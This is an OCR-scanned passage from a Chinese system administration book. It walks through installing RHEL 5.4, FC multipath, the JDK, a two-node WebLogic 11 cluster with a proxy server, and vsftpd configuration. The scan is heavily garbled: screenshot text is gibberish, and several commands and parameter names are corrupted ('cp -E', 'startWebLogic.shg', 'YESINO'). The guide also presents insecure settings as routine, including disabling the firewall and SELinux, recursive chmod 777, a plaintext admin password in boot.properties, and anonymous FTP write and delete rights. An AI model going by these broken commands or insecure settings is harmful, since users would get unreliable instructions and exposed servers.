192.168.0.4 8080 Porxy ProxyServer 
192.168.0.4 | 7003 new_ManagedServer 1 Managed Server 
192.168.0.5 | 7003 new_ManagedServer 2 Managed Server 


5.4.1 RHEL 5.4 操作 系统 的 安装 


RHEL 5.4 是 当前 比较 稳定 的 Linux 服务 器 版 本 ， 本 节 中 将 其 作为 这 次 改造 的 底层 操作 系 
统 。 操 作 系 统 安 装 注意 事项 : 

@ 注意 采用 自动 分 区 ， 自 动 分 区 是 LVM 方式 ， 手 动 划分 磁盘 分 区 容易 造成 找 不 到 分 区 
的 情况 。 牢 记 在 服务 器 装 好 后 ， 不 要 使 用 fdisk 进行 分 区 调整 ， 否 则 会 出 现 严重 错误 ; 
安装 Desktop Environments 依然 选择 安装 Gnome 桌面 环境 ; 
Servers 选项 中 将 右 侧 所 有 的 服务 全 部 去 掉 ; 
在 Virtualization 中 ， 不 要 勾 选 虚拟 技术 ; 另外 防火 墙 设置 成 关闭 状态 ; 
关闭 SELinux 强制 模式 ; 
除 保留 /etc/hosts 文件 中 的 127.0.0.1 外 ， 将 两 台 机 器 相互 指向 对 方 。 


接 下 来 说 明 FC (Fibre Channel) 连接 方式 的 配置 。 服 务 器 安装 FC HBA 卡 ， 通 过 FC 线 连 
接 到 盘 柜 上 的 FC 接口 〈 接 口上 必须 安装 短波 光 模 块 ) ， 也 就 是 主机 和 磁盘 阵列 通过 光纤 交换 
机 连接 ， 速 率 可 达 10Gb/s。 

1. 在 光盘 下 安装 软件 包 

@ device-mapper-1.02.13-6.14.i586.RPM， 该 软件 包 负 责 设备 虚拟 化 和 映射 。 

@ mnultipath-tools-0.4.7-34.38.i586.RPM， 该 软件 包 负 责 路 径 状态 检测 及 管理 。 


等 这 两 个 包 安 装 完成 后 , 使 用 modprobe dm_mnultipath 加 载 相应 模块 , 然后 使 用 lsmod |grep 
dm_mnultipath 检查 安装 是 否 成 功 。 


2. 利用 模板 创 建 multipath.conf 的 配置 文件 


#cp /usr/share/doc/packages/multipath-tools/multipath.conf.synthetic 
/etc/multipath.conf 


然后 在 该 文件 的 最 后 一 段 加 上 如 下 配置 : 


devices { 


device { 
vendor "EMC" // 厂 商 名 称 
product "CaXXXXXn” // 产 品 型 号 
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path grouping policy group_by_prio // 默 认 的 路 径 组 策略 

getuid callout "/sbin/scsi id -p 0x80 -g -u -s /block/sn" // 获 得 唯一 
设备 号 使 用 的 默认 程序 

Prio_callout "/sbin/acs_prio_alua %d" // 获 取 有 限 级 数值 使 用 的 默认 程序 


hardware_handler "1 acs"” // 确 认 用 来 在 路 径 切 换 和 IO 错误 时 ， 执 行 特定 的 操作 的 
模块 


path checker hp_sw // 决 定 路 径 状 态 的 方法 
path selector "round-robin 0"”// 选 择 那 条 路 径 进行 下 一 个 Io 操作 的 方法 


failback immediate // 故 障 恢复 的 模式 
no path retry queue// 在 disable queue 之 前 系统 尝试 使 用 失效 路 径 的 次 数 的 数值 
rr min io 100 // 在 当前 的 用 户 组 中 ， 切 换 到 另外 一 条 路 径 之 前 的 To 请 求 的 数目 


} 


编辑 modprobe.conf 文件 ， 用 来 设置 驱动 程序 的 参数 : 


/etc/modprobe.conf.local 


增加 一 行 "options scsi mod dev flags=Accusys:ACS92102:0x1000" 
重新 编译 引导 文件 : 


"cp -E /boot/initrd-2.6. [kernel version].img ./initrd-2.6. [k_v] .img.bak" 
"mkinitrd" 


做 完 上 述 操作 后 ， 注 意 要 将 操作 系统 重新 启动 。 
5.4.2 Java 环境 的 配置 安装 


Java 在 Linux 系统 安装 的 过 程 中 可 以 默认 安装 ， 但 是 为 了 保证 Java 的 版 本 与 我 们 的 运行 
程序 之 间 进 行 统一 ， 在 安装 系统 的 时 候 ， 没 有 安装 系统 默认 携带 的 Java 版 本 ， 需 要 我 们 安装 
自 定 义 版 本 的 Java， 首 先 我 们 到 http:/www.oracle.com/ 下载 JDK 1.6.21 版 本 ， 选 择 
jdk-6u21-linux-i586-RPM.bin 下 载 到 本 地 /home。 然 后 将 其 安装 到 /usr/localjava 目录 下 : 


# chmod 777 jdk-6u22-linux-i586.bin 

# ./jdk-6u22-linux-i586.bin 

# mkdir -p /usr/local/java 

# cp -RE ./jdkl.6.0 22 /usr/local/java 
# chmod -R 777 /usr/local/java 


5.4.3 ”设置 环境 变量 
我 们 首先 需要 修改 配置 文件 : 


#vi /etc/profile 
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在 文件 的 末尾 加 入 如 下 的 信息 : 


export JAVA HOME=/usr/local/java/jdk1.6.0 22 
export PATH=$PATH:$JAVA HOME/bin:$JAVA HOME/jre/bin 


保存 退出 后 ， 在 控制 台 执行 复制 的 代码 : 


# export JAVA HOME=/usr/local/java/jdk1.6.0 22 
# export PATH=$PATH:$JAVA HOME/bin:$JAVA HOME/jre/bin 


验证 : 


#echo $JAVA HOME 
#java -version 


java version "1.6.0 22" 


Java(TM) SE Runtime Environment (build 1.6.0 22-b04) 
Java HotSpot (TM) Client VM (build 17.1-b03, mixed mode) 


5.4.4 ” WebLogic 11 安装 部 署 


首先 需要 安装 WebLogic，, 将 安装 文件 复制 到 安装 目录 下 ， 执行， 安装 过 程 很 容易 看 懂 ， 图 


5.30 为 关键 安装 步骤 的 截图 。 
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图 5.30 安装 WebLogic 
安装 完毕 后 我 们 开始 创建 服务 。 


1. 创建 新 的 Domino 


#cd /root/Oracle/Middleware/wlserver 10.3/common/bin 
[root@localhost bin]# ./config.sh 


如 图 5.31 所 示 , 单 击 “ 下 一 步 ” 按 钮 。 选择 域 源 , 在 产品 列表 里 选择 第 一 个 默认 选项 Basic 
WebLogic Server Domain-10.3.4.0， 单 击 “ 下 一 步 ” 按 钮 。 


加 便于 可 的 weblog 起 
天 日 B 中 全 主 weotog< 过 


口 扩展 弄 有 的 webLogic 起 
人 过 有 可 以 内 避 站 新疆 代 以 23 要 议 要“ 


如 图 5.32 所 示 ， 指 定 域名 和 域 位 置 ， 即 在 域名 中 输入 cluster_domain， 在 域 位 置 中 输入 
/root/Oracle/Middleware/user_prejects/domain， 然 后 单 击 “下 一 步 ” 按 钮 。 


图 5.31 


2 
撤 定 城 名 和 位 置 
ORACLE 
答 人 城 的 名 和 和 位 村 
[FT 
MN | /ao /Oce /agenare /se prolecrs /don sns Ea 
到 x-# |r-#] 


图 5.32 输入 域名 和 域 位 置 
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2. 配置 管理 员 用 户 和 密码 
如 图 5.33 所 示 ， 在 此 以 weblogic 作为 登录 服务 器 的 用 户 名 ， 密 码 为 “welcomel1”， 单 击 
“下 一 步 ”按钮 。 


配 理 管理 页 用 户 名 和 口令 
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rr ] 
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图 5.33 配置 用 户 和 密码 


3. 配置 服务 器 启动 模式 和 JDK 

由 于 是 在 生产 环境 下 部 署 ， 建 议 在 weblogic 域 的 启动 模式 中 选择 生产 模式 ， 同 时 JDK 选 
择 JRockit SDK 1.6.0_24@/root/Oracle/Middleware/jrockit_160_24_D1.1.2-4, 然后 单 击 “ 下 一 步 ” 
按钮 。 

在 可 选 配置 里 选择 “管理 服务 器 ”和 “ 受 管理 服务 器 , 集群 和 计算 机 ”两 个 选项 , 单 击 “ 下 
一 步 ” 按 钮 。 


4. 配置 管理 服务 器 
在 这 里 ， 监 听 地 址 就 需要 选择 192.168.0.4， 而 不 要 选择 本 机 环 路 地 址 ， 并 启用 SSL 加 密 ， 
如 图 5.34 所 示 。 
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图 5.34 配置 服务 器 管理 器 


配置 需要 创建 的 被 管理 的 应 用 服务 器 和 ProxyServer, 注意 第 2 个 节点 的 他 地 址 要 填 第 二 
个 节点 服务 器 配置 IP, 这 里 是 192.168.0.5, 然后 添加 代理 服务 器 , 端口 配置 为 8080, 单 击 “ 下 
一 步 ”按钮 。 


5. 配置 集群 


如 图 5.35 所 示 ， 单 击 “ 添 加 ”按钮 ， 输 入 Cluster 的 名 称 new_Cluster、 组 播 地 址 Multicast 
address〔〈 用 来 进行 集群 间 的 状态 通信 ) 、 端 口 7777、Cluster 的 各 个 服务 器 地 址 和 端口 ， 完 成 
后 单 击 “下 一 步 ” 按 钮 。 

注意 : 当 用 Configuration Wizard 创建 集群 时 ， 只 能 选择 multicast， 如 果 要 选择 unicast， 
只 能 在 Administration Console 中 修改 集群 的 配置 ， 参 考 Oracle Fusion Middleware Oracle 
WebLogic Server Administration Console 帮助 文档 中 的 “Create and configure clusters” 一 节 内 
容 。multicast address 的 卫 范围 必须 位 于 224.0.0.0~239.255.255.255。WebLogic Server 使 用 的 
mnulticast 默认 值 为 239.192.0.0。 


配置 柴 群 
Own XW FT wna 
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图 5.35 配置 集群 
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6. 向 集群 分 配 服务 器 


如 图 536 所 示 ， 选 择 左 侧 列表 中 的 Managed Server， 将 其 添加 到 右 侧 的 列表 中 ， 但 
Proxy_Server 不 要 添加 到 右 侧 ， 然 后 单 击 “ 下 一 步 ”按钮 。 


Fusion Middleware 环 畦 向 导 ci 
向 丘 群 分 本 服务 器 
ORACLE 
在 右 合 容 术 中 迁 失 一 个 生 群 。 亲 后 在 坟 测 避 格 中 适 择 受 管 腿 务 茂 并 通过 音 击 证 芋头 折 旬 它们 入 配 到 此 入 莘 * 
3 
reveciuster 1 
nagedserer 1 
本 menagedsener 2 
僵 ncManagediermer3 
EF 及 .] Ls |[T-s 


图 5.36 向 集群 分 配 服务 器 


接 下 来 创建 HTTP 代理 应 用 程序 , 如 图 5.37 所 示 , 这 时 就 可 以 选择 Proxy_Server, 单 击 “ 下 
一 步 ”按钮 ， 配 置 计算 机 ， 我 们 不 对 其 进行 配置 。 


创建 HTTP 代理 应 用 程序 


图 5.37 创建 HTTP 代理 应 用 程序 


7. 检 查 WebLogic 配置 


安装 男 一 个 节点 时 , 重复 上 面 的 操作 , 在 “配置 管理 服务 器 ”时 地 址 也 选择 本 机 地 址 ;“ 配 
置 受 管理 服务 器 (代理 服务 器 实际 上 也 是 一 个 受 管理 服务 器 ) ”的 配置 和 第 一 个 节点 的 配置 完 
全 一 样 ， “配置 群集 信息 ”集群 就 不 需要 再 配置 了 ， 继 续 操作 就 行 了 。 图 5.38 为 检查 配置 过 
程 截图 。 
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图 5.38 ”检查 配置 
8. 设置 启动 不 需要 密码 


在 AdminServer/security 目录 下 ， 以 weblogic 用 户 身份 建立 boot.properties 文件 ， 实 现 启 
动 时 不 用 输入 用 户 名 和 密码 ， 内 容 为 : 


username=weblogic 
password=welcomel 


不 用 担心 密码 泄露 , 因为 启动 WebLogic 服务 器 后 , boot.properties 文件 将 被 服务 器 用 AES 
算法 加 密 ， 所 以 建议 大 家 在 调试 好 后 不 要 随意 修改 用 户 名 ， 否 则 这 个 文件 就 失效 了 。 


5.4.5 ”启动 WebLogic 的 AdminServer 服务 


因数 只 有 启动 AdminServer 后 才能 进行 下 面 的 配置 任务 ， 所 以 我 们 在 脚本 目录 bin 下 输 
入 ./startWebLogic.sh， 但 是 这 个 脚本 是 一 个 前 台 程 序 ， 一 旦 窗口 意外 关闭 ， 就 会 导致 应 用 程序 
的 退出 ， 所 以 我 们 用 下 面 的 命令 将 其 放 到 后 台 执 行 。 


nohup ./startWebLogic.shg // 监 听 TcP 7001 端口 
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在 这 里 “nohup” 表 示 给 命令 一 个 非 挂 起 的 信号 ，“&” 表 示 将 服务 器 放 到 后 台 运 行 ， 但 
由 于 后 台 运行 中 有 可 能 报错 ,我 们 在 实际 当中 还 是 在 机 房 主机 X-Window 打开 一 个 窗口 单独 启 
动 它 。 

下 面 是 关键 的 一 个 环节 ， 服 务 器 启动 顺序 如 图 5.39 所 示 ， 次 序 不 能 颠倒 ， 否 则 将 会 报错 ， 
导致 无 法 正常 启动 。 


图 5.39 服务 器 启动 顺序 
启动 第 一 个 节点 。 
启动 第 一 个 节点 的 命令 如 下 : 


./startWebLogic.sh 
./startManagedWebLogic.sh new ManagedServer 1 http://192.168.0.4:7003 
./startManagedWebLogic.sh ProxyServer http://192.168.0.4:8080 


同样 我 们 登录 到 第 二 个 节点 上 启动 第 二 个 节点 服务 。 
园 查看 服务 器 配置 情况 。 
登录 AdminServer 服务 器 管理 端口 ， 如 图 5.40 所 示 。 
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图 5.40 ”登录 AdminServer 服务 器 端口 
园 添加 数据 源 。 
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进入 Consol 控制 台 后 在 左边 的 域 结 构 树 中 单 击 服务 前 的 “+” 号 ， 单 击 “ 新 建 ”按钮 ， 再 
填写 信息 如 图 5.41 所 示 。 
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图 5.41 新 建 信息 填写 
加 再 单 击 “ 新 增 ” 按 钮 ， 填 写 信息 如 图 5.42 所 示 。 
3 上 | 下 = 沙 || 攻 碟 ]| 加 光 | 


释放 卫 置 Dec< 获 扫 旬 里 性 
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图 5.42 新 增 信息 填写 
贺 单 击 “下 一 步 ”按钮 ， 弹 出 如 图 5.43 所 示 的 对 话 框 。 
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更 下 中 心 会 页 jd 首 过 页 加 记录 和 办 a 坎 迎 , weblogic 
查看 更 改 和 重新 自动 
不 存在 暂 持 更 改 。 单 击 “ 基 前 配置 ” 按 印 可 
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图 5.43 ”新建 JDBC 数据 源 


四 A 接 下 来 , 输入 数据 库 名 qbdb， 主 机 名 : 192.168.0.4， 端 口号 : 1521， 以 及 口令 ,如 图 
5.44 所 示 。 
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图 5.44 测试 数据 库 连接 


单 击 “ 测 试 配置 ”按钮 ， 测 试 成 功 后 ， 单 击 “ 完 成 ”按钮 ， 此 数据 源 就 可 以 正常 使 用 了 。 
数据 连接 池 的 调 优 受到 Oracle 的 官方 授权 的 限制 ， 请 购买 授权 后 修改 数据 库 连 接 池 的 参数 。 
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5.4.6 部署 Web 应 用 


在 左 侧 域 结构 树 中 单 击 “ 环 境 ” 前 的 “+” 号 ， 在 展开 的 菜单 中 单 击 “ 服 务 器 ”， 在 右 侧 
的 列表 中 可 以 看 到 各 服务 器 是 否 正 常 启动 ， 如 图 5.45 所 示 。 
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图 5.45 部署 Web 应 用 


若 两 节点 的 状态 都 为 RUNNING， 状 态 为 OK， 就 证 明 各 个 节点 已 经 启动 ， 运 行 正 常 。 如 
果 正 常 启动 则 单 击 左 侧 域 结构 下 的 “部 署 ” 按 钮 ， 如 图 5.46 所 示 。 
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此 贾 中 显示 了 已 经 安装 忆 此 域 的 Java EE 应 月 姓 序 和 独立 应 用 程 守 模 决 列表 。 通 过 首先 选择 庙 用 兴 序 名 , 然后 使 用 此 页 中 的 控件 , 可 以 从 此 域 中 局 动 , 停止 ,更 新 
安装 的 应 月 浊 序 和 模块， 


要 到 革新 友 用 竺 序 于 筑 坎 以 部 天 到 二 中 约 目 夺 , 训 时 主 “ 安 凌 ” 朱 得， 


显示 1 到 2 个 , 共 ?| 


图 5.46 两 节点 运行 状态 


单 击 右 侧 的 “安装 ”按钮 ， 选 择 要 部 署 的 Web 应 用 程序 。 在 “路 径 ” 输 入 框 中 单 击 “ 安 装 ” 
按钮 ， 可 以 手动 输入 Web 应 用 所 在 目录 : /root/Oracle/Middleware/wlserver_ 10.3/resources， 也 可 通 
过 单 击 上 传 来 选择 文件 所 在 目录 ， 如 图 5.47 所 示 。 
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Wo [Dro 


图 5.47 选择 要 部 署 的 Web 程序 


完成 后 ， 单 击 “ 下 一 步 ”按钮 。 图 5.48 为 选择 部 署 目标 ， 即 选择 要 对 其 部 署 此 Web 应 用 
程序 的 服务 器 群集) 。 


Administration Console 
会 主页 退出 首 这 项 加 记录 帮助 | 
二 > 开光 三 >、 碧 和 基于 三 > 吉村 生机 
安装 频 用 程 计 助手 
上 一步 | [下 = 步 | | 到 沪 
连 择 部 轩 目 标 
选择 要 对 其 部 署 此 应 用 程序 的 服务 器 和 /或 群集 。( 可 稍 后 重新 配置 部 署 目标 )- 


DefaultWebApp 的 可 用 目标 : 


图 5.48 选择 部 署 目标 


选中 群集 “new_Cluster” 复 选 框 ， 再 单 击 “ 群 集中 的 所 有 服务 器 ” 单 选 按钮 ， 之 后 单 击 
两 次 “下 一 步 ” 按 钮 ， 再 单 击 “ 完 成 ”按钮 ， 最 后 单 击 左 上 角 的 “激活 更 改 ” 按 钮 。 


5.4.7 ”启动 Web 应 用 
进入 Console 控制 台 后 ， 单 击 左 侧 的 域 结构 下 的 “部 署 ”， 接 着 单 击 选中 部 署 列 表 中 的 应 
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用 (这 里 是 DefaultWebApp) ， 然 后 单 击 “ 启 动 ”按钮 下 的 菜单 项 “为 所 有 请 求 提 供 服务 ”， 
如 图 5.49 所 示 。 


dministration Console 
会 页 退出 首先 项 加 记录 帮助 2 欢迎, weblogic | 连接 到 : 
三 下 > 服务 基质 志 > 部 要 上 委 
部 团委 要 
控制 此 视 


此 页 中 显示 了 已 经 安装 到 此 域 的 Java EE 应 用 程序 和 独立 应 用 程序 模块 列表 。 通 过 首先 选择 应 用 程序 名 , 热 后 使 用 此 页 中 的 控件 , 可 以 从 此 域 中 局 动 , 停止, 更 新 《重新 部 团 ) 
安装 的 应 月 程序 和 模块 ， 
要 安装 新 应 用 程序 或 模块 以 部 署 到 此 域 中 的 目标 , 请 单 击 “ 安 装 ” 按 钮 。 


显示 1 到 2 个 , 共 2 个 上 一 列 


口 | 田 加 oadeproma new_ Chster_1_proxy_sever 


回国 于 


| | EE 


显示 1 到 2 个 , 共 2 个 上 一 列 


图 5.49 进入 Console 控制 台 


接 下 来 在 出 现 的 启动 部 署 页 面 中 单 击 “ 是 ”按钮 。 当 看 到 DefaultWebApp 右 侧 的 状态 从 
“准备 就 绪 ” 转 换 为 “活动 ”时 ， 就 表示 Web 应 用 启动 完成 。 

查看 各 节点 的 JDBC 和 发 布 的 应 用 是 否 正常 。 

在 左 侧 的 “环境 ”选项 中 选择 “服务 器 ”， 然 后 单 击 “ 控 制 一 监视 一 运行 状况 ”， 如 图 
5.50 所 示 。 


BR 恒 | 协 以 日 志 i 录 调式 监视 应 制 部署 服 安全 将 主 
| 过 行 羽 吕 。 通道 ”性 能 | 厂 程 。 计 dj 扣 | 工作 负 藻 “作业 安全 默认 存 贿 ”JH5 SAF | JC8C JIA 


转 彤 线程 卉 村 


此 页 提供 了 有 关 当前 服务 器 6 得 壬 动 信息 
第 一 张 表 提 代 了 有 关 线程 缓冲 也 拟态 的 一 般 信息 * 第 二 张 表 提供 了 有 关 单 个 线程 的 信息 。 
注意 ; 为 单个 线程 显 示 的 用 户 芭 是 在 请 求 的 当前 防 自 执行 线程 的 用户 Ip。 此 去 可 能 在 线程 生命 周 基 内 宰 示 不 同 的 用 户 Jp* 


了 自 定义 此 表 


自 调整 性 线 积 拨 冲 油 (已 篇 选 -更 多 列 存 在 ) 
将 1 且 示 到 111 上 一 页 | 下 一 页 


自动 执行 线程 人 | 执行 线程 总 教 空间 执行 线程 计数 。 队列 长 度 。 竺 定 用 户 清 来 计数 -| 完成 的 请 求 计数 。 独 占线 程 计 笋 | 待机 线程 计数 ”| 吞吐 里 运行 杖 况 


村 6 1 0 o soa56 o 日 7992007992007992 | 六 OK 
将 1 显示 到 二 上 一 页 | 下 一 页 


将 1 县 示 到 5% 上 一 页 | 下 一 页 
名 称 信 请 来 总 教 当前 请 求 事务 用户 空 用 | 阻塞 
4597 
5 
04 


[ACTE] EeeaueThread: 0 for queue: weblogc kemel Defodt (seif-tning) | 
WCThE] ExeasieThread: 1 for oveue: weblogc remel Defoudt Gelf tuniro) 

TOO EvosteThread: 2 fo queue weblog errel De fa (elf sin) 
STANDBY] EveauteThresd: 3 for queue: webbge kemel Default (calfturing) | 


图 5.50 查看 各 节点 是 否 正 常 


va management remcte mi RMIConnecsorImol webogc |febe 
MS hemel> |mue |fake 
re 
ue 


Ms rermel> 


昌 | 尼 | 下 下 | 嵌 
BBE 


<MS Femel> 
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5.4.8 ”WebLogic 优化 


1. 修改 WebLogic 配置 文件 指定 JDK 版 本 和 Java 推 大 小 


打开 WebLogic 的 安装 目录 /opt/weblogic/wlserver_10.3/common/bin。 在 利用 vi 编辑 文件 
commEnv.sh， 更 改 前 请 先 备份 。 找 到 如 下 配置 : 


# Set up JAVA HOME 
JAVA HOME="/opt/weblogic/ijrockit 160 05 R27.6.2-20" 


把 /opt/weblogic/jrockit_160_05_R27.6.2-20 改 为 /opt/weblogic/jdk160_11。 
然后 再 往 下 找 ， 找 到 # Set up JVM options base on value of JAVA_VENDOR 这 人 句 ， 改 为 : 


MAN ARGS="-Xms1024M -Xmx1024 -XX:MaxPermSize=1024M" 
然后 保存 ， 并 重启 WebLogic， 其 他 内 容 不 要 修改 。 


2. 系统 长 时 间 不 操作 后 第 一 次 登录 需要 等 待 很 长 时 间 的 解决 办 法 

登录 管理 页 面 http:/192.168.0.4:7001/console， 在 菜单 中 依次 选择 “JDBC 一 数据 源 一 控制 
一 测试 ”， 在 弹出 的 页 面 中 勾 选 “每 隔 〈) 秒 自动 检测 连接 是 否 可 用 ”选项 ， 括 号 中 的 默认 数 
值 是 300 秒 ， 把 300 秒 修改 为 60 秒 。 

3. 修改 字符 集 

必须 在 每 个 服务 器 中 编辑 /etc/sysconfig/i18n， 实 例文 件 /etc/sysconfig/il8n 的 内 容 如 下 : 


LANG="zh_CN.GB18030" 

LANGUAGE="zh_CN.GB18030:zh_ CN.GB2312:zh_CN" 
SUPPORTED="zh_CN.GB18030:zh CN:zh:en US.UTF-8:en US:en" 
SYSFONT="latarcyrheb-sunl6" 


然后 即 可 令 source /etc/sysconfig/il8n 生效 。 
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VSFTP 是 一 个 基于 GPL 发 布 的 类 Unix 系统 上 使 用 的 FTP 服务 器 软件 ， 它 的 全 称 是 Very 
Secure FTP ， 从 此 名 称 可 以 看 出 来 ， 编 制 者 的 初衷 是 代码 的 安全 。 安 全 性 是 编写 VSFTP 的 初 
囊 ， 除 了 这 与 生 俱 来 的 安全 特性 以 外 ， 高 速 与 高 稳定 性 也 是 VSFTP 的 两 个 重要 特点 。 在 速度 
方面 ， 使 用 ASCII 代码 的 模式 下 载 数据 时 ，VSFTP 的 速度 是 Wu-FTP 的 两 舍 ， 如 果 Linux 主 
机 使 用 2.6.* 的 内 核 ， 在 千 兆 以 太 网 上 的 下 载 速度 可 达 100MB/S。 在 稳定 方面 ，VSFTP 就 更 加 
的 出 色 ，VSFTP 在 单机 〈 非 集群 ) 上 支持 4000 个 以 上 的 并 发 用 户 同 时 连接 ， 根 据 Red Hat 的 
FTP 服务 器 (ftp.redhat.com) 的 数据 ，VSFTP 服务 器 可 以 支持 15000 个 并 发 用 户 。 

VSFTP 集合 了 高 效 易 配置 、 易 管理 、 高 安全 性 为 一 身 ， 市 场 应 用 十 分 广 范 ， 很 多 国际 性 
的 大 公司 和 自由 开源 组 织 都 在 使 用 ， 如 : Red Hat、SUSE、Debian 等 。 


6.1 VSFTP 服务 的 基本 配置 


vsftpd 服务 的 安装 与 应 用 


在 RHEL6 中 安装 vsftpd 服务 需要 一 个 软件 包 就 可 以 了 ， 但 fp 命令 需要 安装 男 一 个 软件 
包 ， 这 与 thel5 有 所 不 同 。 
# Yum install ftp -y 


# yum install vsftpd -y 
# chkconfig vsftpd on 


1. 开放 防火 墙 


# iptables -I INPUT -p tcp --dport 21 -j ACCEPT 


2. 认识 配置 文件 

vsftp 服务 最 重要 的 就 是 其 配置 文件 的 各 个 选项 含义 ， 知 道 含义 就 可 以 很 轻松 地 按照 自己 
的 需求 配置 VSFTP 服务 器 ， 来 实现 各 种 功能 。 配 置 文件 格式 很 简单 : 选项 = 值 ， 注 意 “=” 前 
后 不 能 有 空格 ， 例 如 : 


anonymous_enable=yes # 人 允许 匿名 用 户 登 录 

pam service name=vsftpd # 验 证 方式 

listen=YES # 使 用 standalone 启动 vsftpd， 而 不 是 super daemon (xinetd) 控制 它 (推荐 使 
用 standalone 方式 ) 
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no_anon password=yes # 匿 名 登录 时 是 否 需 要 输入 密码 ， 默 认为 NO 

connect from port 20=YES # 启 用 FTP 数据 端口 的 数据 连接 

chown_uploads=YES|NO # 是 否 修改 匿名 用 户 所 上 传 文件 的 所 有 权 。 YES, 匿名 用 户 所 上 传 的 文件 的 
所 有 权 将 改 为 另外 一 个 不 同 的 用 户 所 有 ， 用 户 由 chown username 参数 指定 。 此 选项 默认 值 为 NO 

chown_username=whoever  # 指 定 拥 有 匿名 用 户 上 传 文件 所 有 权 的 用 户 。 此 参数 与 
chown_uploads 联 用 。 不 推荐 使 用 root 用 户 

anon_root= ## 设 定 匿名 用 户 的 根 目 录 ， 即 匿名 用 户 登 录 后 ， 被 定位 到 此 目录 下 。 主 配置 文件 中 默认 
无 此 项 ， 默 认 值 为 /var/ftp/ 

local _root=# 设 定 本 地 用 户 的 FTP 根 目录 ， 默 认 是 其 家 目录 

anon world readable only=YESINO  # 控制 是 否 只 允许 匿名 用 户 下 载 可 阅读 文档 。YEs， 只 人 允 
许 匿 名 用 户 下 载 可 阅读 的 文件 。No， 人 允许 匿名 用 户 浏览 整个 服务 器 的 文件 系统 。 默 认 值 为 YES 

xferlog_enable=YES # 激 活 上 传 和 下 传 的 日 志 

xferlog_std_format=YES # 用 标准 的 日 志 格式 

tcp_wrappers=YES 支持 tcp_wrappers, 限制 访问 (/etc/hosts.allow, /etc/hosts.deny) 

Rnon_ world readable_only=no # 如 果 设 为 YES， 匿 名 登录 者 会 被 允许 下 载 可 阅读 的 档案 。 默 认 
值 为 YEs 

anon upload enable=yes # 人 允许 匿名 用 户 上 传 

anon_mkdir_write_enable=yes # 人 允许 匿 名 用 户 新 建文 件 夹 

write_enable=yes # 赋 写 权限 

anon_umask=022 # 设 定 匿名 用 户 的 权限 掩 码 。 文 件 默认 创建 的 权限 为 666， 所 以 此 时 实际 上 传 的 文 
件 权限 将 是 666-022=644， 目 录 默 认 创建 的 权限 为 777， 实 际 创建 的 目录 权限 将 是 777-022=755。 但 实 
际 情 况 并 非 全 部 如 此 ， 有 误差 存在 

anon_other write_enable=yes # 匿 名 账号 可 以 有 删除 、 修 改 等 的 权限 

chown_ uploads=yes # 人 允许 修改 上 传 文件 的 权限 

chown_username=root # 上 面 两 项 是 搭配 使 用 的 ， 作 用 是 将 匿名 用 户 上 传 的 文件 属 主 修改 为 root 
用 户 ， 即 匿名 用 户 上 传 后 ， 匿 名 用 户 就 再 无 法 下 载 和 打开 实 操 后 证 实 确 无 法 再 下 载 和 打开 ， 此 时 仍 有 权限 
删除 上 传 的 文件 ， 将 anon_other_write_enable=no 即 可 ) 

ftp_username= “# 匿名 用 户 所 使 用 的 系统 用 户 名 。 默 认 情况 下 ， 此 参数 在 配置 文件 中 不 出 现 ， 值 为 
ftp 

no_anon_password=YES|NO # 控制 匿名 用 户 登 录 时 是 否 需 要 密码 ，YES 不 需要 ，No 需要 。 默 认 值 
为 NO 

deny_email enable=YES|NO # 此 参数 默认 值 为 No 。 当 值 为 YEs 时 ,拒绝 使 用 
banned email file 参数 指定 文件 中 所 列 出 的 e-mail 地 址 进行 登录 的 匿名 用 户 ， 即 ， 当 匿名 用 户 使 用 
banned_ email file 文件 中 所 列 出 的 e-mail 进行 登录 时 ， 被 拒绝 。 显 然 ， 这 对 于 阻击 某 些 Dos 攻击 有 
效 。 当 此 参数 生效 时 ， 需 追加 banned_email file 参数 

banned email file=/etc/vsftpd.banned_emails # 指 定 包含 被 拒绝 的 e-mail 地 址 的 文件 ， 
默认 文件 为 /etc/vsftpd.banned emails 

deny email enable=yes# 启用 上 一 步 中 定义 的 名 单 。 这 两 项 结合 起 来 可 以 建立 黑 名 单 

anon_root=  # 设 定 匿名 用 户 的 根 目录 ， 即 匿名 用 户 登录 后 ， 被 定位 到 此 目录 下 。 主 配置 文件 中 默 
认 无 此 项 ， 默 认 值 为 /var/Etp/ 

anon_world readable on1y=YESINO  # 控制 是 否 只 允许 匿名 用 户 下 载 可 阅读 文档 。YES， 只 多 
许 匿名 用 户 下 载 可 阅读 的 文件 。NO， 人 允许 匿名 用 户 浏览 整个 服务 器 的 文件 系统 。 默 认 值 为 YES 
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anon_ upload enable=YES|NO ”# 控 制 是 否 允 许 匿 名 用 户 上 传 文件 ，YES 允许 ，No 不 允许 ， 默 认 
是 不 设 值 ， 即 为 No。 除了 这 个 参数 外 ， 匿 名 用 户 要 能 上 传 文件 ， 还 需要 两 个 条 件 : 一 ，write_enable 参 
数 为 YEs; 二 ， 在 文件 系统 上 ，FTP 匿名 用 户 对 某 个 目录 有 写 权 限 

anon mkdir write enable=YESINO # 控制 是 否 允 许 匿名 用 户 创建 新 目录 ，YES 允许 ，No 不 允 
许 ， 默 认 是 不 设 值 ， 即 为 No。 当然 在 文件 系统 上 ，FTP 匿名 用 户 必 需 对 新 目录 的 上 层 目 录 拥 有 写 权 限 

anon other write enable=YES|NO  # 控 制 匿 名 用 户 是 否 拥 有 除了 上 传 和 新 建 目 录 之 外 的 其 他 
权限 ， 如 删除 、 更 名 等 。YESs 拥有 ，No 不 拥有 ， 默 认 值 为 NO 

chown_uploads=YES|NO  # 是 否 修改 匿名 用 户 所 上 传 文件 的 所 有 权 。YES, 匿名 用 户 所 上 传 的 文件 
的 所 有 权 将 改 为 另外 一 个 不 同 的 用 户 所 有 ， 用 户 由 chown_username 参数 指定 。 此 选项 默认 值 为 NO 

chown_username=whoever # 指 定 拥 有 匿名 用 户 上 传 文件 所 有 权 的 用 户 。 此 参数 与 chown_uploads 
联 用 。 不 推荐 使 用 root 用 户 

# 本 地 账户 能 够 登录 

local enable=yes # 本 地 账户 登录 后 无 权 删 除 和 修改 文件 

write_enable=no “ # 设 置 本 地 所 有 账户 都 只 能 在 自家 目录 里 

chroot local_user=Yyes # 如 果 只 想 让 部 分 账户 只 能 待 在 自家 目录 里 ， 其 他 用 户 不 受 此 限制 的 话 ， 
要 借助 于 一 个 名 为 : “vsftpd-chroot_1ist” 的 文件 ， 将 受 限 的 用 户 写 在 此 文件 里 ， 一 行 一 个 账户 名 文 
件 名 可 以 改 。 

chroot_1ist_enable=yes# 启 用 通过 列表 来 禁 铀 用 户 在 其 家 目录 中 的 功能 

